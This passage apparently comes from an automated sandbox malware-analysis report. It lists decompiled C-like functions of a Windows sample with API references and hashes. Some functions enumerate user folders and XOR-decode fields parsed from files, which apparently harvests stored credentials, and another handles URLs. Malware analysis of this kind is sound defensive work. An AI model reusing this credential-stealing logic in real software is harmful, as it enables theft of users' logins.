            					if(_t74 > 0) {
            						_t63 =  &_v36;
            						_t38 = 0x3a;
            						E0040F369(_t38,  &_v36);
            						E0040D929( &_v36, _v12, _t58, _t74, _t63);
            					}
            					return E00410418(_v12);
            				} else {
            					_t64 =  &_v84;
            					_t42 = 0x39;
            					E0040F369(_t42, _t64);
            					_v32 = 0x23;
            					_v28 = 0x1a;
            					_v24 = 0x26;
            					_v16 = _t64;
            					_t65 = 0;
            					do {
            						_t45 =  &_v644;
            						__imp__SHGetFolderPathW(0,  *((intOrPtr*)(_t66 + _t65 * 4 - 0x1c)), 0, 0, _t45);
            						_t72 = _t45;
            						if(_t45 == 0) {
            							_t58 =  &_v16;
            							E00415BE8( &_v644,  &_v16, _t72, 1, 2, E00407C5C,  &_v12, 0, 0, 0);
            						}
            						_t65 = _t65 + 1;
            					} while (_t65 < 3);
            					_t74 = _v8;
            					goto L9;
            				}
            			}

            APIs
              • Part of subcall function 004143B6: RegOpenKeyExW.ADVAPI32(80000002,00000000,00000000,00000001,00000000,?,?,0040F571,?,00000017,.exe,00000000,00000000), ref: 004143C9
            • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,00000003,00000000,00000008,?,?,00000001), ref: 00407EC9
            • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,?,?,?,00000003,00000000,00000008,?,?,00000001), ref: 00407F19
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: EnvironmentExpandFolderOpenPathStrings
            • String ID: #$&
            • API String ID: 1994525040-3870246384
            • Opcode ID: fb1cd3abc6a2bd8735100927dcc8fe0c699b6b8511f12d815fc4a792fb0fa9ac
            • Instruction ID: f5d78b5172c31fa2cc344c482bc0a77cf1a96e70773fbc14be6c3ad2750dce8c
            • Opcode Fuzzy Hash: fb1cd3abc6a2bd8735100927dcc8fe0c699b6b8511f12d815fc4a792fb0fa9ac
            • Instruction Fuzzy Hash: E3318F72E04218AADF21EBE1DC49EDE777CEB44714F10846AF605F3180DA786A898B95
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 89%
            			E00408748(void* __ecx, char* __edx, void* __eflags) {
            				intOrPtr _v8;
            				char _v12;
            				char _v16;
            				intOrPtr _v24;
            				intOrPtr _v28;
            				char _v32;
            				char _v48;
            				char _v72;
            				char _v124;
            				short _v644;
            				short _v1164;
            				void* __ebx;
            				void* __edi;
            				void* __esi;
            				void* _t29;
            				void* _t31;
            				void* _t36;
            				void* _t38;
            				void* _t42;
            				WCHAR* _t45;
            				void* _t55;
            				char* _t64;
            				signed int _t65;
            				void* _t66;
            				intOrPtr _t74;
            
            				_t58 = __edx;
            				_t55 = __ecx;
            				E004104CB( &_v12,  &_v12, 0, 8);
            				_t29 = 0x4e;
            				E0040F369(_t29,  &_v124);
            				_t31 = 0x4f;
            				E0040F369(_t31,  &_v48);
            				_t36 = E004143B6(0x80000001, 0x104, _t55,  &_v644,  &_v124,  &_v48);
            				if(_t36 != 0xffffffff) {
            					_t69 = _t36;
            					if(_t36 > 0) {
            						ExpandEnvironmentStringsW( &_v644,  &_v1164, 0x104);
            						E004084D7(_t69,  &_v1164,  &_v12);
            					}
            				}
            				if(_v8 != 0) {
            					L9:
            					if(_t74 > 0) {
            						_t63 =  &_v32;
            						_t38 = 0x51;
            						E0040F369(_t38,  &_v32);
            						E0040D929( &_v32, _v12, _t58, _t74, _t63);
            					}
            					return E00410418(_v12);
            				} else {
            					_t64 =  &_v72;
            					_t42 = 0x50;
            					E0040F369(_t42, _t64);
            					_v32 = 0x1a;
            					_v28 = 0x26;
            					_v24 = 0x23;
            					_v16 = _t64;
            					_t65 = 0;
            					do {
            						_t45 =  &_v644;
            						__imp__SHGetFolderPathW(0,  *((intOrPtr*)(_t66 + _t65 * 4 - 0x1c)), 0, 0, _t45);
            						_t72 = _t45;
            						if(_t45 == 0) {
            							_t58 =  &_v16;
            							E00415BE8( &_v644,  &_v16, _t72, 1, 2, E0040850F,  &_v12, 0, 0, 0);
            						}
            						_t65 = _t65 + 1;
            					} while (_t65 < 3);
            					_t74 = _v8;
            					goto L9;
            				}
            			}

            APIs
              • Part of subcall function 004143B6: RegOpenKeyExW.ADVAPI32(80000002,00000000,00000000,00000001,00000000,?,?,0040F571,?,00000017,.exe,00000000,00000000), ref: 004143C9
            • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,00000003,00000000,00000008,?,?,00000001), ref: 004087AD
            • SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,?,?,?,00000003,00000000,00000008,?,?,00000001), ref: 004087FD
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: EnvironmentExpandFolderOpenPathStrings
            • String ID: #$&
            • API String ID: 1994525040-3870246384
            • Opcode ID: 532419b0cfec5ed70d14e4089e73b01c5c4489069dd3c3cf0f3d71c96ff3f43a
            • Instruction ID: 7cb8742c9ca09a8ff5568783c70821ef80f094f4785c990d3721d78182314cd1
            • Opcode Fuzzy Hash: 532419b0cfec5ed70d14e4089e73b01c5c4489069dd3c3cf0f3d71c96ff3f43a
            • Instruction Fuzzy Hash: 82316E72D00218AADF20EAA19D49FDFB77CEB44714F10847AF604F3181DA785A898BA4
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E00415AC4(WCHAR* _a4) {
            				signed short _t4;
            				short _t9;
            				signed int _t10;
            				WCHAR* _t11;
            				WCHAR* _t13;
            				int _t19;
            
            				_t13 = _a4;
            				_t9 = 0;
            				_t11 = PathSkipRootW(_t13);
            				if(_t11 == 0) {
            					_t11 = _t13;
            				}
            				while(1) {
            					_t4 =  *_t11 & 0x0000ffff;
            					if(_t4 == 0x5c || _t4 == 0x2f || _t4 == 0) {
            						goto L5;
            					}
            					L11:
            					_t11 =  &(_t11[1]);
            					continue;
            					L5:
            					_t10 = _t4 & 0x0000ffff;
            					 *_t11 = 0;
            					if(GetFileAttributesW(_t13) == 0xffffffff) {
            						_t19 = CreateDirectoryW(_t13, 0);
            					}
            					if(_t19 == 0) {
            						L13:
            						return _t9;
            					} else {
            						if(_t10 == 0) {
            							_t9 = 1;
            							goto L13;
            						}
            						 *_t11 = _t10;
            						goto L11;
            					}
            				}
            			}

            APIs
            • PathSkipRootW.SHLWAPI(?,.exe,00000000,?,00000000,004059B1,?,?,?,?,?,00000000,?,00000017,?,00000000), ref: 00415ACF
            • GetFileAttributesW.KERNEL32(?,?,00000000,004059B1,?,?,?,?,?,00000000,?,00000017,?,00000000,00000000,00000002), ref: 00415AFA
            • CreateDirectoryW.KERNEL32(?,00000000,?,00000000,004059B1,?,?,?,?,?,00000000,?,00000017,?,00000000,00000000), ref: 00415B08
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: AttributesCreateDirectoryFilePathRootSkip
            • String ID: .exe
            • API String ID: 4231520044-4119554291
            • Opcode ID: 5f4843266c44a810852a767538cf0336d61564938a3391df69adeed481feb075
            • Instruction ID: 19ef5d6567273b6890ed45b4c484af55532722c0e5b248279dc5de7e5d4c7a03
            • Opcode Fuzzy Hash: 5f4843266c44a810852a767538cf0336d61564938a3391df69adeed481feb075
            • Instruction Fuzzy Hash: 51F0FC35184625DBC6301A296C447F7B798DE817E07954627FDD197360D7387CC2927C
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E0040CD7B(WCHAR* __ebx, void* __ecx, char _a4) {
            				void* __edi;
            				long _t3;
            				WCHAR* _t13;
            
            				_t13 = __ebx;
            				if( *0x41aa80 == 0) {
            					E00403ED1(__ecx, 0x41aa80, 2);
            					 *((short*)(E00410454(0x41ac88, 0x41aa80, E00411098(0x41aa80) + _t10) + 0x41ac88)) = 0;
            					_t3 = PathRemoveFileSpecW(0x41ac88);
            				}
            				if(_t13 != 0) {
            					E004107C1(_t3 | 0xffffffff, 0x41aa80, _t13);
            					_t3 = PathRenameExtensionW(_t13, L".tmp");
            				}
            				if(_a4 != 0 &&  *0x41a4fc > 1) {
            					E00415AC4(0x41ac88);
            					E00413904(0x41ac88);
            					_t3 = GetFileAttributesW(0x41aa80);
            					if(_t3 != 0xffffffff) {
            						return E00413904(0x41aa80);
            					}
            				}
            				return _t3;
            			}

            APIs
            • PathRemoveFileSpecW.SHLWAPI(0041AC88,0041AC88,0041AA80,00000000,00000002,00000000,00020000,0040D856,00000001,?,8793AEF0,00000002,00002723,00020000,00000000,00002722), ref: 0040CDB3
            • PathRenameExtensionW.SHLWAPI(00000000,.tmp,00000000,00020000,0040D856,00000001,?,8793AEF0,00000002,00002723,00020000,00000000,00002722,00020000,?,?), ref: 0040CDCF
            • GetFileAttributesW.KERNEL32(0041AA80,0041AC88,0041AC88,00000000,00020000,0040D856,00000001,?,8793AEF0,00000002,00002723,00020000,00000000,00002722,00020000,?), ref: 0040CDF2
              • Part of subcall function 00403ED1: PathRenameExtensionW.SHLWAPI(?,.dat,?,0041A2F0,00000000,00000032,?,774B9EB0,00000000), ref: 00403F4A
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: Path$ExtensionFileRename$AttributesRemoveSpec
            • String ID: .tmp
            • API String ID: 3627892477-2986845003
            • Opcode ID: 437ff8529e8adc2a2313f7dba550cd0a4688e97ce315d8cdc2935d85ae9108d4
            • Instruction ID: ff4a0e6cf7770cbb46ffb1399c1cc435dff76c605b5ccefbc27db7cba67aef21
            • Opcode Fuzzy Hash: 437ff8529e8adc2a2313f7dba550cd0a4688e97ce315d8cdc2935d85ae9108d4
            • Instruction Fuzzy Hash: F0F0D670A4115066E3113736ACC9AFF2A5D4F82329B18427FF111B51F1DBBC49D686EE
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 86%
            			E00415981(WCHAR* _a4) {
            				short _v524;
            				char _v1044;
            				void* __edi;
            				void* _t11;
            				void* _t19;
            				void* _t20;
            
            				if(GetTempPathW(0xf6,  &_v524) - 1 > 0xf5) {
            					L6:
            					return 0;
            				}
            				_t19 = 0;
            				while(1) {
            					_push(E00411812());
            					_push(L"tmp");
            					_t18 =  &_v1044;
            					_t11 = E004111A5(_t10, 0x104,  &_v1044, L"%s%08x");
            					_t20 = _t20 + 0xc;
            					if(_t11 == 0xffffffff) {
            						goto L6;
            					}
            					if(E00415D45(_t18, _a4,  &_v524) == 0 || CreateDirectoryW(_a4, 0) == 0) {
            						_t19 = _t19 + 1;
            						if(_t19 < 0x64) {
            							continue;
            						}
            						goto L6;
            					} else {
            						return 1;
            					}
            				}
            				goto L6;
            			}

            APIs
            • GetTempPathW.KERNEL32(000000F6,?,00000000,?), ref: 00415998
              • Part of subcall function 00411812: GetTickCount.KERNEL32 ref: 00411812
              • Part of subcall function 00415D45: PathCombineW.SHLWAPI(?,?,004014A8,004038F5,?,?,?,00000000), ref: 00415D65
            • CreateDirectoryW.KERNEL32(?,00000000,?,?), ref: 004159EA
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: Path$CombineCountCreateDirectoryTempTick
            • String ID: %s%08x$tmp
            • API String ID: 1218007593-1196434543
            • Opcode ID: 4cd818f440a9816f39389b82fda7f1bfd9b68499b0f0f8bb2723b25885b9daa6
            • Instruction ID: 66161d0e6316a1f645c538f4e73e369e1521aab0bc427a269a70e6073044d410
            • Opcode Fuzzy Hash: 4cd818f440a9816f39389b82fda7f1bfd9b68499b0f0f8bb2723b25885b9daa6
            • Instruction Fuzzy Hash: F4F07DB2200614E6DA202B14DC05BEF7B5CCB81724F104233FE15FA1E1D67C9EC6869E
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E00411C1D(void* __ecx) {
            				signed int _v8;
            				struct HINSTANCE__* _t7;
            
            				_v8 = _v8 & 0x00000000;
            				_t7 = GetModuleHandleW(L"kernel32.dll");
            				if(_t7 == 0) {
            					L4:
            					return _t7 & 0xffffff00 | _v8 != 0x00000000;
            				} else {
            					_t7 = GetProcAddress(_t7, "IsWow64Process");
            					if(_t7 == 0) {
            						goto L4;
            					} else {
            						_t7 = _t7->i(0xffffffff,  &_v8);
            						if(_t7 != 0) {
            							goto L4;
            						} else {
            							return 0;
            						}
            					}
            				}
            			}

            APIs
            • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,004036ED,00000000,00403AF4), ref: 00411C2A
            • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00411C3A
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: AddressHandleModuleProc
            • String ID: IsWow64Process$kernel32.dll
            • API String ID: 1646373207-3024904723
            • Opcode ID: b0f4205cafa3be70abea1d5b954419b691e7c28adc2e7b262e1e1aed0168d355
            • Instruction ID: 1c4824f158137962995ed49fa72eecf5ee8bc92daaa8de0918b71470d24403ed
            • Opcode Fuzzy Hash: b0f4205cafa3be70abea1d5b954419b691e7c28adc2e7b262e1e1aed0168d355
            • Instruction Fuzzy Hash: E5E04830350205B6DF444BA18D06BDBB7EC5B05B99F140265E112F51D0FA7CDB489568
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E0040C3DA(intOrPtr _a4, intOrPtr _a12) {
            				void* __esi;
            				void* _t6;
            				signed int _t7;
            				intOrPtr _t9;
            
            				if(_a12 == 0x64 || _a12 == 0x33) {
            					EnterCriticalSection(0x41aa60);
            					_t7 = E0040BDA6(_a4);
            					if(_t7 != 0xffffffff) {
            						_t9 =  *0x41aa78; // 0x0
            						_t7 = SetEvent( *(_t7 * 0x24 + _t9 + 4));
            					}
            					LeaveCriticalSection(0x41aa60);
            					return _t7;
            				}
            				return _t6;
            			}

            APIs
            • EnterCriticalSection.KERNEL32(0041AA60), ref: 0040C3F0
            • SetEvent.KERNEL32(?), ref: 0040C411
            • LeaveCriticalSection.KERNEL32(0041AA60), ref: 0040C418
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: CriticalSection$EnterEventLeave
            • String ID: 3
            • API String ID: 3094578987-1842515611
            • Opcode ID: 6c8104d50b8c54ba577f17cbf2393710e1a04754efc8851b89e7cd51192aa2b0
            • Instruction ID: b8a8e98652e51eefab459ab17ec87f12440760544f39ffcb702e9268e7f67414
            • Opcode Fuzzy Hash: 6c8104d50b8c54ba577f17cbf2393710e1a04754efc8851b89e7cd51192aa2b0
            • Instruction Fuzzy Hash: A0E06D31100100EBC7119B25A98886ABB64EED6336704C63FF419B21B0C7388891CB1A
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 93%
            			E004091AC(void* __ecx, signed char* __edx, void* __eflags, intOrPtr _a4) {
            				char _v524;
            				char _v576;
            				char _v580;
            				char _v588;
            				intOrPtr _v608;
            				char _v612;
            				char _v620;
            				char _v628;
            				char _v632;
            				char* _v640;
            				signed int _v644;
            				char* _v648;
            				char** _v652;
            				intOrPtr _v656;
            				intOrPtr _v660;
            				char* _v664;
            				char* _v668;
            				char* _v672;
            				char* _v676;
            				void* __edi;
            				void* __esi;
            				signed int _t75;
            				char* _t76;
            				intOrPtr _t78;
            				void* _t81;
            				void* _t82;
            				void* _t84;
            				void* _t86;
            				void* _t88;
            				char** _t94;
            				char* _t105;
            				char* _t111;
            				char* _t112;
            				void* _t113;
            				char* _t116;
            				char* _t117;
            				void* _t121;
            				char* _t149;
            				void* _t150;
            				signed int _t160;
            				char* _t161;
            				char** _t162;
            				intOrPtr _t164;
            				char* _t165;
            				signed int _t166;
            				void* _t168;
            
            				_t168 = (_t166 & 0xfffffff8) - 0x294;
            				if(E00415D45( &(__edx[0x2c]),  &_v524, __ecx) == 0) {
            					L31:
            					return 1;
            				}
            				_t171 =  *__edx & 0x00000010;
            				if(( *__edx & 0x00000010) == 0) {
            					_push( &_v524);
            					_t75 = 2;
            					_t76 = E00415750(_t75,  &_v524,  &_v612);
            					__eflags = _t76;
            					if(_t76 == 0) {
            						goto L31;
            					}
            					_t78 = E00410D04(_v608,  &_v652, _v612, 1, 0);
            					_v660 = _t78;
            					__eflags = _t78 - 0xffffffff;
            					if(_t78 == 0xffffffff) {
            						L30:
            						E004157F8( &_v612);
            						goto L31;
            					}
            					_t81 = HeapAlloc( *0x41bc68, 8, 0x626);
            					_v640 = _t81;
            					_t82 = 0x68;
            					E0040F333(_t82,  &_v588);
            					_t84 = 0x69;
            					E0040F333(_t84,  &_v628);
            					_t86 = 0x6a;
            					E0040F333(_t86,  &_v620);
            					_t88 = 0x6b;
            					E0040F333(_t88,  &_v576);
            					__eflags = _v640;
            					if(_v640 == 0) {
            						L29:
            						E00410418(_v640);
            						E00410434(_v652, _v656);
            						goto L30;
            					}
            					_v644 = 0;
            					__eflags = _v648;
            					if(_v648 > 0) {
            						do {
            							_t160 = _v644 << 2;
            							_t94 = _v652 + _t160;
            							__eflags =  *_t94;
            							if( *_t94 == 0) {
            								goto L28;
            							}
            							_v664 = StrStrIA( *_t94,  &_v588);
            							_t149 = StrStrIA( *(_t160 + _v656),  &_v632);
            							_v668 = StrStrIA( *(_t160 + _v660),  &_v628);
            							_t105 = StrStrIA( *(_t160 + _v664),  &_v588);
            							__eflags = _v676;
            							_t161 = _t105;
            							if(_v676 == 0) {
            								goto L28;
            							}
            							__eflags = _v672;
            							if(_v672 == 0) {
            								goto L28;
            							}
            							__eflags = _t161;
            							if(_t161 == 0) {
            								goto L28;
            							}
            							_v676 =  &(_v676[8]);
            							_v672 =  &(_v672[6]);
            							_t162 =  &(_t161[0xa]);
            							_v652 = _t162;
            							E00409184(_v676);
            							E00409184(_v672);
            							E00409184(_t162);
            							__eflags = _t149;
            							if(_t149 == 0) {
            								L15:
            								_t150 = 0x15;
            								L16:
            								__eflags =  *_v676;
            								if( *_v676 == 0) {
            									goto L28;
            								}
            								__eflags =  *_v672;
            								if( *_v672 == 0) {
            									goto L28;
            								}
            								_t111 =  *_t162;
            								__eflags = _t111;
            								if(_t111 == 0) {
            									goto L28;
            								}
            								__eflags = _t111 - 0x30;
            								if(_t111 == 0x30) {
            									L21:
            									__eflags = _t162[0];
            									if(_t162[0] == 0) {
            										goto L28;
            									}
            									L22:
            									_t112 = 0;
            									__eflags =  *_t162;
            									if( *_t162 == 0) {
            										goto L28;
            									} else {
            										goto L23;
            									}
            									do {
            										L23:
            										_t112[_t162] = _t112[_t162] ^ 0x00000019;
            										_t112 =  &(_t112[1]);
            										__eflags = _t112[_t162];
            									} while (_t112[_t162] != 0);
            									__eflags = _t112;
            									if(_t112 > 0) {
            										_t163 =  &_v580;
            										_t113 = 0x2e;
            										E0040F369(_t113,  &_v580);
            										_push(_t150);
            										_push(_v676);
            										_t151 = _v656;
            										_push(_v652);
            										_push(_v672);
            										_t116 = E004111A5(_t163, 0x311, _v656, _t163);
            										_t168 = _t168 + 0x14;
            										__eflags = _t116;
            										if(_t116 > 0) {
            											_t164 = _a4;
            											_t117 = E00410818(_t116, _t164, _t151);
            											__eflags = _t117;
            											if(_t117 != 0) {
            												_t61 = _t164 + 4;
            												 *_t61 =  &(( *(_t164 + 4))[1]);
            												__eflags =  *_t61;
            											}
            										}
            									}
            									goto L28;
            								}
            								__eflags = _t111 - 0x31;
            								if(_t111 != 0x31) {
            									goto L22;
            								}
            								goto L21;
            							}
            							_t152 =  &(_t149[6]);
            							_v648 =  &(_t149[6]);
            							E00409184(_t152);
            							_t150 = E00410ABC(_v648, _t152, 0);
            							__eflags = _t150 - 1;
            							if(_t150 < 1) {
            								goto L15;
            							}
            							__eflags = _t150 - 0xffff;
            							if(_t150 <= 0xffff) {
            								goto L16;
            							}
            							goto L15;
            							L28:
            							_v644 = _v644 + 1;
            							__eflags = _v644 - _v648;
            						} while (_v644 < _v648);
            					}
            					goto L29;
            				} else {
            					_t165 =  &_v612;
            					_t121 = 0x67;
            					E0040F369(_t121, _t165);
            					_v648 = _t165;
            					E00415BE8( &_v524,  &_v648, _t171, 1, 5, E004091AC, _a4, 0, 0, 0);
            					goto L31;
            				}
            			}

            APIs
              • Part of subcall function 00415D45: PathCombineW.SHLWAPI(?,?,004014A8,004038F5,?,?,?,00000000), ref: 00415D65
            • HeapAlloc.KERNEL32(00000008,00000626,?,00000001,00000000,?,?), ref: 0040925F
            • StrStrIA.SHLWAPI(?,?), ref: 004092D4
            • StrStrIA.SHLWAPI(?,?), ref: 004092E6
            • StrStrIA.SHLWAPI(?,?), ref: 004092F6
            • StrStrIA.SHLWAPI(?,?), ref: 00409308
              • Part of subcall function 00415BE8: FindFirstFileW.KERNEL32(?,?,?,?,00000000,00000000,00000104), ref: 00415C27
              • Part of subcall function 00415BE8: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00415C4E
              • Part of subcall function 00415BE8: PathMatchSpecW.SHLWAPI(?,?), ref: 00415C99
              • Part of subcall function 00415BE8: Sleep.KERNEL32(00000000,?,?), ref: 00415CF6
              • Part of subcall function 00415BE8: FindNextFileW.KERNEL32(?,?), ref: 00415D24
              • Part of subcall function 00415BE8: FindClose.KERNEL32(?), ref: 00415D36
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: Find$FilePath$AllocCloseCombineFirstHeapMatchNextObjectSingleSleepSpecWait
            • String ID:
            • API String ID: 1635188419-0
            • Opcode ID: 98ecc4d0ab032505792b92bf9f4530215f7d651f82a1e8f9d0d3b23ffc75dddd
            • Instruction ID: 26de7116fe1e3e149dccd2365830bd4b657dd8cfac2353edbbc91d90cfd6093a
            • Opcode Fuzzy Hash: 98ecc4d0ab032505792b92bf9f4530215f7d651f82a1e8f9d0d3b23ffc75dddd
            • Instruction Fuzzy Hash: 5571AF31508350AFD721DF24C845A9BB7E5AFC8718F00092EF994A72D2D779DD4ACB8A
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 90%
            			E00406ECA(void* __edx, intOrPtr _a4) {
            				char _v9;
            				signed int _v16;
            				char _v17;
            				char _v24;
            				void* _v32;
            				char _v36;
            				char _v60;
            				char _v72;
            				intOrPtr _v76;
            				char* _v80;
            				void* _v96;
            				intOrPtr _v144;
            				void* _v156;
            				char _v248;
            				char _v512;
            				void* __ebx;
            				void* __edi;
            				void* __esi;
            				intOrPtr _t108;
            				void* _t113;
            				void* _t117;
            				void* _t120;
            				void* _t128;
            				void* _t130;
            				char* _t133;
            				char _t138;
            				void* _t142;
            				void* _t145;
            				void* _t146;
            				void* _t149;
            				intOrPtr _t153;
            				intOrPtr _t154;
            				intOrPtr* _t156;
            				intOrPtr _t160;
            				void* _t163;
            				void* _t164;
            				void* _t165;
            				int _t170;
            				void* _t173;
            				char _t176;
            				void* _t180;
            				signed int _t183;
            				void* _t188;
            				signed int _t190;
            				char* _t191;
            				intOrPtr _t192;
            				char* _t194;
            				void* _t195;
            				char* _t200;
            				char* _t201;
            				intOrPtr _t203;
            				intOrPtr* _t204;
            				intOrPtr _t205;
            				char* _t208;
            				void* _t209;
            				void* _t212;
            
            				_t195 = __edx;
            				_t183 = 0;
            				_v16 = 0;
            				_v9 = 0xff;
            				EnterCriticalSection(0x41a9bc);
            				_t189 =  *0x41a9d8; // 0x0
            				if(_t189 == 0) {
            					L8:
            					_t205 = _a4;
            					L9:
            					LeaveCriticalSection(0x41a9bc);
            					_t108 =  *((intOrPtr*)(_t205 + 0x30));
            					_t216 = _t108 - _t183;
            					if(_t108 == _t183) {
            						L33:
            						if((_v16 & 0x00000001) == 0) {
            							_t154 =  *((intOrPtr*)(_t205 + 0x34));
            							_t234 = _t154 - _t183;
            							if(_t154 != _t183 && E004068DC(_t189, _t195, _t234, 3, _t154,  *(_t205 + 4),  *(_t205 + 8)) != 0) {
            								_v16 = _v16 | 0x00000001;
            							}
            						}
            						_v17 = 0;
            						if( *((intOrPtr*)(_t205 + 0x1c)) >= 0x21) {
            							_t149 = 0xd;
            							E0040F333(_t149,  &_v72);
            							_t203 =  *((intOrPtr*)(_t205 + 0x18));
            							if(E00410489( &_v72, _t203, 0x21) == 0) {
            								_t153 =  *((intOrPtr*)(_t203 + 0x21));
            								if(_t153 == 0x3b || _t153 == 0) {
            									_v17 = 1;
            								}
            							}
            						}
            						_t190 = 8;
            						if(_v9 != 0xff) {
            							__eflags = _v9 - 1;
            							if(_v9 != 1) {
            								goto L52;
            							}
            							goto L51;
            						} else {
            							if( *((char*)(_t205 + 0x14)) != 1 ||  *((intOrPtr*)(_t205 + 0x24)) <= _t183) {
            								L52:
            								if((_v16 & _t190) == 0) {
            									L82:
            									if((_v16 & 0x00000001) == 0) {
            										if(E00406940(_t195, _t205) != 0) {
            											_v16 = _v16 | 0x00000002;
            										}
            										if(_v17 != 0 && E00406CD5(_t195, _t205) != 0) {
            											_v16 = _v16 | 0x00000004;
            										}
            									}
            									return _v16;
            								}
            								_t112 =  *((intOrPtr*)(_t205 + 0x24));
            								_v9 = 0;
            								if( *((intOrPtr*)(_t205 + 0x24)) != _t183) {
            									__eflags = _v17;
            									if(_v17 == 0) {
            										__eflags =  *((intOrPtr*)(_t205 + 0x1c)) - _t183;
            										if( *((intOrPtr*)(_t205 + 0x1c)) != _t183) {
            											_t113 = 9;
            											E0040F333(_t113,  &_v60);
            											_t117 = E00411233( &_v32,  &_v60,  *((intOrPtr*)(_t205 + 0x18)));
            											_t209 = _t209 + 0xc;
            											__eflags = _t117 - 1;
            											if(_t117 >= 1) {
            												_t183 = _v32;
            											}
            											L69:
            											if(_t183 == 0) {
            												L81:
            												_v16 = _v16 & 0xfffffff7;
            												goto L82;
            											}
            											E0040BB16( &_v24);
            											_t120 = E0041065D( *(_t205 + 8), 0,  *(_t205 + 4));
            											_t199 = _t120;
            											if(_t120 != 0) {
            												_t195 = 0x3c;
            												E004104CB( &_v156,  &_v156, 0, _t195);
            												_v156 = _t195;
            												if(InternetCrackUrlA( *(_t205 + 4),  *(_t205 + 8), 0,  &_v156) == 1) {
            													_t128 = 6;
            													E0040F369(_t128,  &_v248);
            													_t130 = 0xa;
            													E0040F369(_t130,  &_v60);
            													_t208 = _v24;
            													_t191 = 0x401ff4;
            													if(_t208 == 0) {
            														_t208 = 0x401ff4;
            													}
            													_t133 =  *(_a4 + 0xc);
            													if(_t133 == 0) {
            														_t133 = "-";
            													}
            													if((_v16 & 0x00000001) != 0) {
            														_t191 =  &_v60;
            													}
            													_push(_t183);
            													_push(_t208);
            													_push(_t133);
            													_push(_t191);
            													_t138 = E0040D965(_t191, _t195, (0 | _v144 == 0x00000004) + 0xb, (0 | _v144 == 0x00000004) + 0xb, _t199, 0,  &_v248, _t199);
            													_t205 = _a4;
            													_v9 = _t138;
            												}
            												E00410418(_t199);
            											}
            											E00410418(_v24);
            											E00410418(_t183);
            											if(_v9 != 0) {
            												goto L82;
            											} else {
            												goto L81;
            											}
            										}
            										_t200 =  &_v36;
            										E0040F333(_t190, _t200);
            										_push(_t200);
            										_push(9);
            										L66:
            										_pop(_t142);
            										_t183 = E00410882(_t142);
            										goto L69;
            									}
            									_t183 = E00410882(_t112,  *((intOrPtr*)(_t205 + 0x20)));
            									_t145 = 0;
            									__eflags = _t183;
            									if(_t183 == 0) {
            										goto L81;
            									}
            									__eflags =  *((intOrPtr*)(_t205 + 0x24));
            									if( *((intOrPtr*)(_t205 + 0x24)) <= 0) {
            										goto L69;
            									} else {
            										goto L58;
            									}
            									do {
            										L58:
            										_t192 =  *((intOrPtr*)(_t145 + _t183));
